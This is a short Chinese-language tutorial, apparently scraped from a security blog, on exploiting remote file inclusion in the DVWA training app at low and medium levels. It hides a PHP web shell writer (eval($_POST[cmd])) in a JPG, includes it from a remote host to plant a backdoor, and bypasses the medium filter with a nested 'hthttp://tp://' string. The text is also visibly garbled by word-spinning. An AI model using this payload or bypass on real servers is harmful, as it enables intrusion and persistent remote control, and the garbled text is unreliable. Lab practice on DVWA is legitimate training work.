1、制作一句话图片,放到一台做事器上,该做事器ip:192.168.152.128

将yc.jpg照片拖入edjpgcom软件,添加下面这句话

<?fputs(fopen("1.php","w"),'<?php eval($_POST[cmd]);?>')?>

php判断远程文件是否存在长途文件包括破绽 jQuery

2、访问一下该图片:http://192.168.152.128/yc.jpg

3、选择文件包含页面

4、实行远程文件包含并天生后门

http://192.168.152.188/dvwa/vulnerabilities/fi/?page=http://192.168.152.128/yc.jpg

5、在/var/www/dvwa/vulnerabilities/fi目录天生了1.php

6、菜刀链接

二、环境:DVWA,medium级别

前三步和low级别一样

我们查看一下源码,创造屏蔽了http://和https://

4、实行远程文件包含并天生后门

http://192.168.152.188/dvwa/vulnerabilities/fi/?page=hthttp://tp://192.168.152.128/yc.jpg

成功绕过

禁止造孽,后果自大

欢迎关注"大众年夜众号:web安全工具库